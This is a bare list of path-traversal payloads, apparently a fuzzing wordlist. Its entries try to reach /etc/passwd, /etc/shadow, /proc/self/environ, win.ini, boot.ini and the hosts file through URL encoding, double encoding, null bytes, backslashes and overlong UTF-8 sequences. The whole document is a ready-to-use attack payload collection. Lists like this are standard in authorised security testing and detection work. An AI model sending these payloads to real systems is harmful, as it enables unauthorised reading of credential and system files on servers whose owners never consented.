../../../../etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
....//....//....//etc/passwd
..\\..\\..\\windows\\win.ini
..%5c..%5c..%5cwindows%5cwin.ini
/etc/passwd
/etc/passwd%00
../../../../etc/shadow
../../../../proc/self/environ
..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..;/..;/..;/etc/passwd
....\/....\/etc/passwd
/var/www/html/../../../etc/passwd
file:///etc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
../../../../boot.ini
..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
%00../../../../etc/passwd
..%2e%2e%2f..%2e%2e%2fetc%2fpasswd
..%255c..%255cwindows%255cwin.ini
/static/../../../etc/passwd
images/../../../etc/passwd
..%ef%bc%8f..%ef%bc%8fetc/passwd
